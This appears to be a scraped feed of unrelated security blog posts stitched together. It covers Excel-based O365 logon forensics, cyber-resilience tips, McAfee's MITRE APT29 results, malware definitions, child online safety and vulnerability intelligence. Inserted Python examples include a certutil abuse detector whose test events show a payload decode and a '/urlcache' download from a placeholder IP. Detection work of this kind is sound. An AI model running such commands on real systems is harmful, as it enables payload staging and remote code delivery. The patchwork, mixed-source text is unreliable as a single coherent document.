Now that our dataset is completely enriched by either using VLOOKUP or XLOOKUP, we can start hunting for anomalous activity. As a quick first step, since we know at least a handful of IP addresses are potentially malicious, we can filter on the “Threat Intel” column for all rows that match “TMP.OGRE” and reveal logons with source IP addresses related to known threat actors. Now we have timeframes and suspected compromised accounts to pivot off of for additional hunting through other data.
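The same enrichment step, written in Python rather than in Excel, as an added example that is not part of the original post. It performs the exact-match lookup the post configures with VLOOKUP's match type of 0 (or XLOOKUP's default), and shows the edge case the Excel formulas hit silently: an IP address that is absent from the intel sheet comes back as #N/A, which has to be resolved rather than treated as a clean result. The user names are the post's; the IP addresses (RFC 5737 documentation ranges), coordinates and timestamps are constructed, and TMP.OGRE is the fictional actor the post names.

```python
"""Exact-match enrichment of O365 logon rows from an "IP Address Intel" sheet.

Added example, not code from the original post. All rows are constructed:
the IPs are RFC 5737 documentation addresses, TMP.OGRE is the post's fictional
threat actor, and the coordinates are placeholders.
"""

# Constructed "IP Address Intel" sheet: IP address -> (Latitude, Longitude, Threat Intel)
IP_INTEL = {
    "203.0.113.10": (48.8566, 2.3522, "TMP.OGRE"),
    "203.0.113.11": (48.8566, 2.3522, "TMP.OGRE"),
    "198.51.100.7": (40.7128, -74.0060, ""),
}

# Constructed O365 logon rows, limited to the columns the lookup needs
LOGONS = [
    {"User": "Ginger Breadman", "IP address": "198.51.100.7", "Date": "2020-03-02 08:15:00"},
    {"User": "Ginger Breadman", "IP address": "203.0.113.10", "Date": "2020-03-04 23:41:10"},
    {"User": "William Brody",   "IP address": "203.0.113.11", "Date": "2020-03-05 01:02:33"},
    {"User": "William Brody",   "IP address": "192.0.2.200",  "Date": "2020-03-05 09:00:00"},  # absent from intel sheet
]

NOT_FOUND = "#N/A"  # what VLOOKUP(..., 0) / XLOOKUP return when the key is missing


def enrich(rows, intel):
    """Return copies of rows with Latitude, Longitude and Threat Intel columns added.

    Exact matching only: an IP that is not in the intel sheet gets NOT_FOUND in all
    three columns instead of the nearest key that approximate matching (VLOOKUP's
    default of TRUE on sorted data) would silently hand back.
    """
    out = []
    for row in rows:
        hit = intel.get(row["IP address"].strip())
        lat, lon, ti = hit if hit else (NOT_FOUND, NOT_FOUND, NOT_FOUND)
        out.append({**row, "Latitude": lat, "Longitude": lon, "Threat Intel": ti})
    return out


def suspect_logons(enriched, actor):
    """The post's first filter: rows whose Threat Intel column matches the actor."""
    return [r for r in enriched if r["Threat Intel"] == actor]


def unresolved(enriched):
    """IPs the intel sheet did not cover; these still need a lookup before the
    Threat Intel filter can be trusted as complete."""
    return sorted({r["IP address"] for r in enriched if r["Threat Intel"] == NOT_FOUND})


if __name__ == "__main__":
    rows = enrich(LOGONS, IP_INTEL)
    for r in suspect_logons(rows, "TMP.OGRE"):
        print(f'{r["Date"]}  {r["User"]:<16} {r["IP address"]:<14} {r["Threat Intel"]}')
    print("unresolved:", unresolved(rows))
```

The `unresolved` helper is the check worth adding in the workbook too: a filter on the Threat Intel column for `#N/A` before filtering on the actor name, so that gaps in the intel sheet are visible rather than absorbed into the rows that look benign.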


One of the most useful tools for highlighting anomalies by summarizing data, performing frequency analysis and quickly obtaining other statistics about a given dataset is Excel’s PivotTable function.

Location Anomalies

Let’s utilize a PivotTable to perform frequency analysis on the location from which users logged in. This type of technique may highlight activity where a user account logged in from a location which is unusual for them.

To create a PivotTable for our data, we can select any cell in our O365 data and select the entire range with Ctrl+A. Then, under the “Insert” tab in the ribbon, select “PivotTable”:

Figure 10: PivotTable selection

This will bring up a window, as seen in Figure 11, to confirm the data for which we want to make a PivotTable (Step 1 in Figure 11). Since we selected our O365 log data set with Ctrl+A, this should be automatically populated. It will also ask where we want to put the PivotTable (Step 2 in Figure 11). In this instance, we created another sheet called “PivotTable 1” to place the PivotTable:

Figure 11: PivotTable creation

Now that the PivotTable is created, we must select how we want to populate the PivotTable using our data. Remember, we are trying to determine the locations from which all users logged in. We will want a row for each user and a sub-row for each location the user has logged in from. Let’s add a count of how many times they logged in from each location as well. We will use the “Date” field to do this for this example:

Figure 12: PivotTable field definitions

Examining this table, we can immediately see there are two users with source location anomalies: Ginger Breadman and William Brody have a small number of logons from “FarFarAway”, which is abnormal for these users based on this data set.

We can add more data to this PivotTable to get a timeframe of this suspicious activity by adding two more “Date” fields to the “Values” area. Excel defaults to “Count” of whatever field we drop in this area, but we will change this to the “Minimum” and “Maximum” values by using the “Value Field Settings”, as seen in Figure 13.

Figure 13: Adding min and max dates

Now we have a PivotTable that shows us anomalous locations for logons, as well as the timeframe in which the logons occurred, so we can hone our investigation. For this example, we also formatted all cells with timestamp values to reflect the format FireEye Mandiant typically uses during analysis by selecting all the appropriate cells, right-clicking and choosing “Format Cells”, and using a “Custom” format of “YYYY-MM-DD HH:MM:SS”.

Figure 14: PivotTable with suspicious locations and timeframe

IP Address Anomalies

Geolocation anomalies may not always be valuable. However, using a similar configuration as the previous example, we can identify suspicious source IP addresses. We will add “User Principal Name” and “IP Address” fields as Rows, and “IP Address” as Values. Let’s also add the “App” field to Columns. Our field settings and resulting table are displayed in Figure 15:

Figure 15: PivotTable with IP addresses and apps

With just a few clicks, we have a summarized table indicating which IP addresses each user logged in from, and which app they logged into. We can quickly identify two users logged in from IP addresses in the range six times, and which applications they logged into from each of these IP addresses.
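The same two views, as an added example in Python rather than Excel (this is not code from the FireEye post): it groups constructed O365 sign-in rows by user and location with a count and the first and last timestamp, then by user, IP address and app, and flags locations that are rare for a given user. The column names, the sample rows and the 25% rarity threshold are assumptions.

```python
"""Scriptable version of the two PivotTable views: logons per user and
location with first/last timestamp, and logons per user, IP address and app.
Added example over constructed data; column names follow the field names used
in the text, but the rows are invented."""
import csv
from collections import defaultdict
from datetime import datetime
from io import StringIO

# Constructed O365 sign-in export (not real log data); RFC 5737 test addresses.
SAMPLE_LOG = """\
Date,User Principal Name,Location,IP Address,App
2020-04-01 08:02:11,ginger.breadman@example.com,Gingerbread Land,203.0.113.10,Exchange Online
2020-04-01 08:05:40,william.brody@example.com,Gingerbread Land,203.0.113.11,SharePoint Online
2020-04-02 09:14:03,ginger.breadman@example.com,Gingerbread Land,203.0.113.10,Exchange Online
2020-04-02 09:30:12,william.brody@example.com,Gingerbread Land,203.0.113.11,Exchange Online
2020-04-03 22:47:19,ginger.breadman@example.com,FarFarAway,198.51.100.7,Exchange Online
2020-04-03 23:02:55,william.brody@example.com,FarFarAway,198.51.100.7,Exchange Online
2020-04-04 07:58:30,william.brody@example.com,Gingerbread Land,203.0.113.11,SharePoint Online
2020-04-04 10:20:00,ginger.breadman@example.com,Gingerbread Land,203.0.113.10,SharePoint Online
"""

TS_FORMAT = "%Y-%m-%d %H:%M:%S"  # the timestamp layout the text formats cells to


def load(text):
    """Parse the CSV export into a list of dicts keyed by column name."""
    return list(csv.DictReader(StringIO(text)))


def pivot(rows, *fields):
    """Group rows by the given fields; per group keep Count, Min and Max of
    Date, which is what the PivotTable's Values area computes."""
    table = {}
    for row in rows:
        key = tuple(row[f] for f in fields)
        ts = datetime.strptime(row["Date"], TS_FORMAT)
        entry = table.setdefault(key, {"count": 0, "first": ts, "last": ts})
        entry["count"] += 1
        entry["first"] = min(entry["first"], ts)
        entry["last"] = max(entry["last"], ts)
    return table


def rare_locations(rows, max_share=0.25):
    """Locations that account for at most max_share of a user's logons,
    with the timeframe of that activity.  The threshold is an assumption;
    tune it to the size of the data set under review."""
    by_user_loc = pivot(rows, "User Principal Name", "Location")
    totals = defaultdict(int)
    for (user, _), entry in by_user_loc.items():
        totals[user] += entry["count"]
    flagged = []
    for (user, loc), entry in sorted(by_user_loc.items()):
        if entry["count"] / totals[user] <= max_share:
            flagged.append((user, loc, entry["count"],
                            entry["first"].strftime(TS_FORMAT),
                            entry["last"].strftime(TS_FORMAT)))
    return flagged


if __name__ == "__main__":
    rows = load(SAMPLE_LOG)
    for hit in rare_locations(rows):
        print("anomalous location:", hit)
    # Second view: which IP addresses each user logged in from, and to which app.
    for key, entry in sorted(pivot(rows, "User Principal Name", "IP Address", "App").items()):
        print(key, entry["count"])
```

Against the constructed rows, both users are flagged for their single “FarFarAway” logon, with the 2020-04-03 timeframe attached; the user/IP/app view is the second PivotTable with the IP address as the count column.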

While these are just a couple use cases, there are many ways to format and view evidence using PivotTables. We recommend trying PivotTables on any data set being reviewed with Excel and experimenting with the Rows, Columns, and Values parameters.

We also recommend adjusting the PivotTable options, which can help reformat the table itself into a format that might fit requirements.


These Excel functions are used frequently during investigations at FireEye Mandiant and are considered important forensic analysis techniques. The examples we give here are just a glimpse into the utility of LOOKUP functions and PivotTables. LOOKUP functions can be used to reference a multitude of data sources and can be applied in other situations during investigations such as tracking remediation and analysis efforts.

PivotTables may be used in a variety of ways as well, depending on what data is available, and what sort of information is being analyzed to identify suspicious activity. Employing these techniques, alongside the ones we highlighted previously, on a consistent basis will go a long way in "excelerating" forensic analysis skills and efficiency.

5 Ways to Improve Business Cyber-Resilience


A popular military maxim speaks to the need for redundancy: “Two is one and one is none.” Redundancy is also a key principle of cyber-resilience; the data protection and disaster recovery equivalent is the 3-2-1 backup rule: keep three copies of your data, on two different types of media, with one copy off-site. IT pros often borrow from military strategy when approaching cyber-resilience, including the strategy known as “defense in depth.”

Defense in depth is a useful framework for protecting IT environments. It acknowledges that hackers will often use evasive tactics or brute force to overrun the outer-most layer of defense. So, multiple layers of defense are necessary – or defense in depth – to anticipate and mitigate lost ground. Cyber-resilience is a very high priority for businesses. So, we put together these five tips for improving cyber-resilience based on a defense-in-depth approach.

Tip #1: Sharpen perimeter defenses

Cybercriminals are getting better at using evasive tactics to circumvent company firewalls and antivirus. Some of these evasive tactics include file-based, file-less, obfuscated and encrypted script attacks. To counter these tactics, we’re rolling out a new shield technology to detect, block and remediate evasive attacks much faster and more effectively than before. Webroot® Evasion Shield stops attacks that elude other endpoint protection solutions. Cloud-based threat intelligence further increases resilience at the perimeter.

Tip #2: Strengthen the first line of defense – people

The primary vector for malware distribution is phishing attacks. While cybercriminals find increasingly deceptive ways to trick employees into downloading malicious code, not enough businesses are countering by educating their workforces about identifying suspicious activity. With employees being the weakest link in the cyber-security chain, the solution is regular security awareness training, with phishing simulations and courses on best practices for identifying and reporting suspicious activity.

Tip #3: Secure your DNS connection

The domain name system (DNS) translates the names people type into the IP addresses that internet traffic is routed to, including the traffic that reaches your website. But the DNS protocols were not designed with security in mind. They are exposed to attacks such as cache poisoning, DDoS, DNS hijacking and man-in-the-middle, and malware routinely abuses DNS for botnet Command-and-Control (C&C) traffic. A cloud-based DNS security solution lets businesses enforce web access policies and stop threats at the network’s edge, before a connection to a malicious domain is ever made from the network or its endpoints.

Tip #4: Create and deploy a backup strategy 

Redundancy is essential for cyber-resilience. Businesses must consider a scenario where malware circumvents outer defenses. Since detecting and remediating malware infections can be time-consuming, it’s important to have copies of files and data for business continuity. Scheduled backup with file versioning is necessary for mitigating malware infections and other forms of data loss. The scheduling feature is crucial since leaving it up to users exposes backup policy to human error.

Tip #5: Test recovery strategy regularly

Backup and recovery go hand-in-hand. And backup is only effective if it enables rapid recovery with minimal disruption. It’s important to test disaster recovery practices and procedures before you experience a live disaster scenario. Disasters come in different shapes and sizes, so it’s important to test simple file and folder recovery as well as large-scale system restore. Also, some systems are more critical than others. Tier-one systems (the most critical) need high levels of uptime, approaching 100%. This traditionally requires a secondary data center that is very costly to acquire and maintain. This is no longer the case. Disaster recovery as a service reduces the cost of standing up a secondary environment. It also allows for frequent testing of disaster recovery protocols. Businesses should test once a quarter – or at least once a year – to ensure systems are cyber-resilient when necessary.

To get started on the road to cyber resilience, take a free trial here.

The post 5 Ways to Improve Business Cyber-Resilience appeared first on Webroot Blog.

MITRE APT29 Evaluation – Importance of Prevention in Endpoint Security

In our recent Racing with Cozy Bear blog, we covered the concept of Time Based Security and highlighted the value protection brings to the defender. This is not to say that blocking an attack removes the threat actor from the equation. Attack-blocking protection slows down the offender, buying the defender valuable time to respond. There are three reasons for this:

  1. Blocking an advance forces the offender to change their approach and try again
  2. Block-level detections are inherently high fidelity, elevating their priority for defenders
  3. Defenders can focus on other higher priority detected events that have not been blocked

As part of the APT29 evaluation, MITRE did not allow vendors to deploy products in blocking mode, so as not to interfere with the test. However, they did allow the deployment of such technologies in non-blocking mode, and allowed participants to highlight scenarios where products would have blocked.

Block-level detections bolstered McAfee’s performance more than any other vendor.

In future evaluations MITRE has stated that protection results will receive their own categories, but during the APT29 evaluation, MITRE captured block-level detections as footnotes as shown in Figure 1.

Figure 1 – Example of Block footnote

From a defender’s perspective, the more definitive a detection is, the more actionable it is, and the more value it carries. In keeping with Time Based Security, Host Interrogation has been brought into the following chart, a visual representation of the detection types from the evaluation.

Figure 2 – Time-Based representation of the value for each detection type

The scope of MITRE’s APT29 evaluation covered 20 major steps across all participating vendors, covering 57 techniques spread across 134 sub-steps. One major step was removed due to emulation challenges, leaving 19 major steps.

The following chart plots the highest-ranking detection from each participant. Each step represents one of the major attacker milestones as emulated, and an opportunity for the defender to protect, detect, and respond.

Figure 3 – Time-Based Security view of best coverage per major step

Another representation of this data is to aggregate these top-detection values for each participant. Here a block modifier is applied to fully represent non-blocking detections as well.

Table 1 – Block Modifier value assignments
Figure 4 – Aggregate Time-Based Security view

Not only did block-level detections bolster McAfee’s performance more than any other vendor, but MVISION Endpoint was the only solution to report such detections on several attack steps.

An example of this in action was captured during:

  • Step 11 – Initial Compromise
    • Technique T1140 (Deobfuscate/Decode Files or Information)
      • Sub-step 11.A.10 (Decoded an embedded DLL payload to disk using certutil.exe)

Living off the land binaries (aka lolbins) are native operating system files that can be (ab)used for more than their original intent. Adversaries are known to use them to bypass security controls, since most of these programs are otherwise trusted. Whether launched from a macro or from the command line, there are many documented examples. A popular choice of groups such as APT28, Turla, Oilrig, and APT10 is the ‘certutil.exe’ tool. Originally intended to query certificate information or configure Certificate Services, it can also be used to obfuscate/de-obfuscate data (T1140) or for remote file copy (T1105) to download files.

At the time of this writing, MITRE has 70 report references for T1140, indeed making it a go-to technique for many offenders. Figures 5 and 6 were captured during the evaluation of this technique.
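A detection check for the certutil.exe abuse described above, added here as an example; it is not McAfee’s JTI rule, whose logic the post does not publish. It normalises a process-creation command line (quoted full path, forward or back slashes, ‘-’ or ‘/’ switch prefixes, mixed case) and reports T1140 for the decode/encode switches and T1105 for a URL fetch via -urlcache or -verifyctl. The sample events, file names and address are constructed, and the switch lists are an assumption about what to alert on.

```python
"""Detection logic for certutil.exe abuse in process-creation events:
decode/encode of a payload (T1140) and download of a remote file (T1105).
Added example with constructed events; this is not McAfee's JTI rule, whose
logic the post does not publish."""
import re
import shlex

# Switch names certutil documents for these behaviours (an assumption about
# what to alert on, not an exhaustive list).
DECODE_SWITCHES = {"decode", "decodehex", "encode", "encodehex"}
FETCH_SWITCHES = {"urlcache", "verifyctl"}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def parse_certutil(cmdline):
    """Split a Windows command line; return (switches, positional args) when
    the image is certutil, else None.  '-' and '/' switch prefixes, mixed
    case and a quoted full path are all normalised before matching."""
    try:
        argv = shlex.split(cmdline, posix=False)   # keep backslashes literal
    except ValueError:                             # unbalanced quotes
        argv = cmdline.split()
    if not argv:
        return None
    image = argv[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in ("certutil.exe", "certutil"):
        return None
    switches, args = set(), []
    for tok in argv[1:]:
        tok = tok.strip('"')
        if tok[:1] in ("-", "/"):
            switches.add(tok[1:].lower())
        else:
            args.append(tok)
    return switches, args


def classify(cmdline):
    """Return the ATT&CK technique ID the command line matches, or None."""
    parsed = parse_certutil(cmdline)
    if parsed is None:
        return None
    switches, args = parsed
    if switches & DECODE_SWITCHES:
        return "T1140"
    if switches & FETCH_SWITCHES and any(URL_RE.match(a) for a in args):
        return "T1105"
    return None


# Constructed process-creation events: (pid, command line).  File names and
# the address are invented, not taken from the evaluation.
SAMPLE_EVENTS = [
    (4120, r'"C:\Windows\System32\certutil.exe" -decode C:\Users\Public\stage.txt C:\Users\Public\stage.dll'),
    (4127, r"certutil.exe -hashfile C:\Tools\installer.msi SHA256"),
    (4133, r"CERTUTIL /urlcache /split /f http://198.51.100.7/update.bin C:\Users\Public\update.bin"),
    (4140, r"powershell.exe -decode notcertutil"),
]


def scan(events):
    """Return (pid, technique) for every event that matches."""
    hits = []
    for pid, cmdline in events:
        technique = classify(cmdline)
        if technique:
            hits.append((pid, technique))
    return hits


if __name__ == "__main__":
    for pid, technique in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: certutil used for {technique}")
```

The benign -hashfile invocation and the non-certutil image are left alone, which is the fidelity point the post makes about block-level detections: the rule fires on the switch combination, not on the presence of certutil.exe.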

Figure 5 – JTI rule prevents living-off-the-land attacks using certutil.exe during sub-step 11.A.10
Figure 6 – JTI rule prevents living-off-the-land attacks using certutil.exe during sub-step 11.A.10


While this coverage was provided by MVISION Endpoint, the underlying technology involved is the same in McAfee Endpoint Security 10.7.

Ultimately, coverage is about time. MITRE’s APT29 evaluation in its own way highlighted McAfee’s Time Based Security protection and McAfee’s distinction in block-level detection. Buying time by throwing a speed bump into the path of a speeding Cozy Bear can be the difference in winning the race for security.

*All data is from:


© 2018 – 2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

The post MITRE APT29 Evaluation – Importance of Prevention in Endpoint Security appeared first on McAfee Blogs.

Malware, Virus, Anti-malware, Antivirus: What’s the Difference?

Romeo once asked the now infamous question, “what’s in a name?” If he’d been asking about malicious software, Juliet surely would have answered, “well, it’s complicated.” The world of cybersecurity has been such a goldmine of new terms and buzzwords that it is easy to get them a bit jumbled. Read on to find out the difference between malware and a virus, and how you can best protect your organization from them.

Viral Terminology

Malware is the broad term that covers every type of software that is created to disable or damage computer systems. Though people often use virus as the generic term for malicious software, a virus is actually just one type of malware. Below are descriptions of a few of the most common pieces of malware:


  • Virus- Just like its biological namesake, a computer virus infects a computer system by replicating itself without user permission, inserting its own code into preexisting programs. In order to spread to other systems, the virus must be attached to a file or executable program, and only infects a system when opened. This typically causes various amounts of damage, from impeding work through annoying popups to causing a complete system crash.

  • Worm- Similar to a virus, a worm can replicate itself on a computer system and cause varying levels of damage. Unlike a virus, a worm is a standalone program, and does not need to be attached to a file and opened to spread. A worm exploits vulnerabilities in a system, and uses network connections to infect other systems with similar weaknesses.

  • Spyware- Spyware is software that monitors, collects, and transmits data from a computer system without a user’s or organization’s knowledge.

  • Ransomware- Ransomware is software that holds data hostage, typically by encrypting it, and demands payment to restore it, increasingly with the added threat to publish or destroy the data if the ransom is not paid.


Another popular type of malware that’s been in the news recently is cryptojacking, also called coin mining malware. This malware infects a computer system like a parasite, sucking the processing power to use it to mine for cryptocurrency like Bitcoin. One particularly nasty version of cryptojacking that’s been dominating the web is masquerading as an Adobe Flash update. Cryptojacking can slow down a computer system to a crawl or crash it altogether.

Building Malware Defenses

With all these destructive pieces of malware, how can your organization protect itself? To truly defend your environment, it’s vital to have a solution that guards from as many pieces of malware as possible. For example, antivirus software that only protects a system from viruses can’t block something like the cryptojacking software described above.

Just as Romeo explained to Juliet, you can’t simply rely on a name to ensure that your solution is the right one. Since the terms virus and malware have so often been used interchangeably, both anti-malware and antivirus solutions can protect against different types of malware. It’s important to focus on a specific product and what it does, instead of what it’s called.

Powertech Antivirus provides server-level malware protection for organizations running Linux, AIX, and IBM i. With its robust defenses, it detects and removes viruses, worms, Trojans, and more so you can sleep without fear of unwelcome system visitors. Further, using predictive analysis, Powertech Antivirus detects new pieces of malware before they become widespread, so you’re never caught off guard.





Author: Bob Erdman
Protect your IBM Systems from Malware

Get started with a free trial

Top cyber security tips for keeping kids safe online

If you’re among the millions of people working from home while also trying to entertain and educate your kids during the coronavirus pandemic, we imagine things have been pretty chaotic.

Were it not for the option of sitting your kids in front of a laptop for a few hours to do their schoolwork or play games, things might be even worse.

But while the technology gives you a break, do you have complete peace of mind about your children’s safety online? The Internet can be a dangerous place, which is why we talk so often about the importance of secure browsing.

We’re not only talking about parental controls, which, although they help you limit the kinds of activities that kids do online, don’t address a whole range of other threats. Let’s take a look at some of those risks and the things that children should do to stay safe online.

1. Install antivirus software

The first step anyone should take to protect themselves from cyber security threats is to install antivirus software.

These programs are designed to prevent anything nasty from getting onto your device and to alert you when something suspicious appears.

Most computers come with built-in antivirus software (Windows uses a program called Defender, for example), which should be sophisticated enough to tackle everyday cyber security threats.

However, there are also plenty of programs you can pay for if you’re looking for something more resilient.

Whatever system you use, antivirus software tends to be relatively unobtrusive, running in the background and only popping up when it detects something fishy going on.

The only potential problem is that antivirus software can’t stop you from doing something risky that it doesn’t recognise as outright malicious – in many cases it simply alerts you to a suspected threat and recommends that you take action.

It’s therefore up to parents to teach children about the importance of these warnings. To the untrained eye, they might be confused with annoying spammy pop-ups that you simply click away from.

Of course, the opposite is true – and it’s only by paying attention to what an antivirus program is telling you that you can prevent a whole lot of trouble down the line.

2. Make sure updates are applied

You’re probably familiar with alerts telling you that software needs to be updated and your computer restarted.

We often think they’re inconvenient, because we want to get on with whatever we were doing. But these updates are important and must be done sooner rather than later, because they improve the software and often patch vulnerabilities that could lead to cyber attacks.

It’s therefore essential that any device your child uses is updated regularly, with patches applied as soon as possible.

3. Watch out for phishing emails

Plenty of people on the Internet claim to be someone they’re not. For example, one of the biggest threats Internet users currently face is phishing.

These are malicious messages that appear to be from a trusted source, but attempt to trick users into handing over sensitive information or downloading malware.

There are two kinds of phishing that children should be concerned about, the first of which are email scams. Although the majority of these end up in spam folders, the more convincing ones can fool these detection tools and land in your kids’ inboxes.

Typical examples of phishing emails include messages supposedly from online services that claim that the recipients’ login information needs to be updated. When you click the link, you’re sent to a bogus version of that site and asked to provide your credentials.

If you do as the site asks, you’re simply handing out your details to them, which they can use to access your account and perhaps even try the same credentials on other accounts.

The other type of phishing scam children should be aware of involves social media, which we take a look at in our next point.

4. Monitor social media activity

Platforms such as Twitter and Reddit have revolutionised the way we think about staying safe online. A generation ago, we were constantly warned about the risks of speaking to strangers over the Internet, but now many websites are designed specifically for that purpose.

Although the majority of those people are harmless, there are still people who take advantage of this. One way they do that is through social media phishing scams.

One such scheme works like this: your child sends a tweet to McDonald’s about a promotional offer. A cyber criminal who owns a Twitter account with a name like “McD’s Customer Support” jumps onto the reply and directs your kid to a website that asks them to sign up to receive the latest news, but is actually designed to siphon off their personal details.

You can help your children avoid these risks by teaching them to be careful of any communication that directs them to a website asking them to provide personal details.

When it comes to sites such as Facebook and Instagram, where you’re likely to reveal a lot of information about yourself, it may well be wise to make your account private. That means only people you’re friends with or who follow you can see your profile.

5. Think before handing out personal data

Pretty much every website you visit collects some sort of data about you. This might be relatively harmless information, like tracking cookies that help the website see what links you click and how long you stay on a page, but other practices aren’t as benign.

For example, you might be asked to create an account, in which case you’ll need to submit an email address and password, and maybe even your name, date of birth and other details.

Whenever you provide this information, there is the risk that it will be misused – either intentionally or accidentally.

Say, for instance, the organisation suffered a data breach and the information it collected was leaked online. A cyber criminal could send targeted scams to your child.

Although adults generally understand these risks, children aren’t as aware. It’s therefore up to you to teach them that this type of information is valuable and shouldn’t be shared with just anyone.

The GDPR (General Data Protection Regulation) is a big help here, because it contains added protections regarding the way organisations collect and store children’s personal data.

In the UK, organisations that use consent to collect the personal data of someone under the age of 13 need to seek the approval of someone with “parental responsibility” and take reasonable steps to ensure that the person providing this approval is who they say they are.

This means that where an organisation relies on consent to offer an online service directly to a child under 13, it has to come to you, the parent, for that consent, so you will know which organisations are requesting their personal data.

The only exception to the GDPR’s rule is when the information is collected for preventive or counselling services offered directly to the child. The parental figure is often the reason the child is seeking these services, so it makes sense for the organisation to bypass their approval.

Staying secure during the coronavirus pandemic

The pandemic has blurred the lines between your work and home life, and the last thing you need is your kids creating problems that could affect your job.

This will be a significant problem if you don’t have your own work-issued laptop or phone, or if cyber criminals are able to attack your Wi-Fi router.

You should be particularly cautious about letting your children play games or do other potentially dangerous things on devices that you use for work.

This is just one of the reasons why coronavirus presents an unprecedented challenge for organisations. It affects all parts of your business and there is no end in sight.

However, what is certain is that it’s more important than ever to remain vigilant and aware of the threats your organisation faces.

One virus is enough to contend with. Make sure you’re prepared to tackle whatever else comes your way with our packaged solutions, which include tools and services to help you address remote working best practices, network vulnerabilities and a host of other issues.

Find out more


The post Top cyber security tips for keeping kids safe online appeared first on IT Governance UK Blog.

Researchers Uncover Novel Way to De-anonymize Device IDs to Users’ Biometrics

Researchers have uncovered a potential means to profile and track online users using a novel approach that combines device identifiers with their biometric information. The details come from a newly published research titled "Nowhere to Hide: Cross-modal Identity Leakage between Biometrics and Devices" by a group of academics from the University of Liverpool, New York University, The Chinese

Coming Soon – “Active Directory Security for Attackers and Defenders”


From the U.S. Department of Defense to the Trillion $ Microsoft Corporation, and from the White House to the Fortune 100, today over 85% of organizations worldwide operate on Microsoft Active Directory.

The cyber security of these foundational Active Directory deployments worldwide is thus paramount to cyber security worldwide, and yet, unfortunately, the Active Directory deployments of most organizations remain alarmingly vulnerable to compromise.

To help thousands of organizations adequately bolster their existing Active Directory security defenses, and to help millions of cyber security and IT personnel worldwide enhance their proficiency in this paramount subject, starting May 05, 2020, I will personally be sharing Active Directory security insights for everyone's benefit, at the Paramount Defenses Blog.

Save the date - May 05, 2020.

Best wishes,

How An Image Could’ve Let Attackers Hack Microsoft Teams Accounts

Microsoft has patched a worm-like vulnerability in its Teams workplace video chat and collaboration platform that could have allowed attackers to take over an organization's entire roster of Teams accounts just by sending participants a malicious link to an innocent-looking image. The flaw, impacting both desktop and web versions of the app, was discovered by cybersecurity researchers at

Webcast: How to Build a Home Lab

This is a joint webcast from Black Hills Information Security and Active Countermeasures. How many of us have tried some new configuration option, utility, or hardware on a production environment, only to crash a critical piece of the business? (me raising hand…) It’s amazing how quickly we learn not to do that! Now we have […]

The post Webcast: How to Build a Home Lab appeared first on Black Hills Information Security.

Putting the Model to Work: Enabling Defenders With Vulnerability Intelligence — Intelligence for Vulnerability Management, Part Four

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Organizations often have to make difficult choices when it comes to patch prioritization. Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. This problem is compounded by the ever-changing threat landscape and increased access to zero-days.

At FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. 

In this blog post, we’ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.

Functions of Vulnerability Intelligence

Vulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:

Figure 1: Vulnerability intelligence can help with risk assessment and informed decision making

Tailoring Vulnerability Prioritization

We believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.

Figure 2: Patch Prioritization Philosophy

Integration of Vulnerability Intelligence in Internal Workflows

Based on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.

Figure 3: Integration of vulnerability intelligence into internal workflows

Tools and Use Cases for Operationalizing Vulnerability Intelligence

1. Automate Processes by Fusing Intelligence with Internal Data

Automation is valuable to security teams with limited resources. Similar to automated detecting and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant Intelligence API) and aggregated into a SIEM, Threat Intelligence Platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (“FIVE”), described in more detail below for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.

Security teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level agreements (SLAs) could state that ‘high’ risk vulnerabilities that have an exploitation rating of ‘available,’ ‘confirmed,’ or ‘wide’ must be patched within a set number of days. Of course, the SLA will depend on the company’s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process.

Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability disclosed and patched in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light.

Another potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization’s unique threat profile and business operations.

2. Communicating with Internal Stakeholders

Teams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.

